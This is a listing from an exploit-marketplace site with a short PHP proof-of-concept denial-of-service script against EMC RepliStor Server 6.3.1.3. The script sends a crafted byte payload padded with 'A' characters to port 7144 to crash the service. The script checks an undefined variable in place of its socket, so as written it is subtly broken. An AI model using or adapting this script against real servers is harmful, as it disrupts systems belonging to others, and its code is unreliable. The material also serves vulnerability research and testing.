[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

EMC RepliStor Server 6.3.1.3 DoS

Author
bellick
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9756
Category
dos / poc
Date add
20-10-2009
Platform
unsorted
================================
EMC RepliStor Server 6.3.1.3 DoS
================================

# Title: EMC RepliStor Server 6.3.1.3 DoS
# CVE-ID: ()
# OSVDB-ID: ()
# Author: bellick
# Published: 2009-10-20
# Verified: yes

view source
print?
<?php
    /*
    EMC RepliStor Server (rep_serv.exe) 6.3.1.3 remote denial of
    service poc
    by Nine:Situations:Group::bellick
      
    */
      
    $host = "192.168.0.1";
    $port = 7144;
      
    $_sock = fsockopen($host, $port, $errno, $errstr, 2);
    if (!$fp) {
        echo "$errstr ($errno)\n";
    } else {
        $_p = "\x54\x93\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41";
        fputs($_sock, $_p);
        fclose($_sock);
    }
?>


#  0day.today [2024-12-24]  #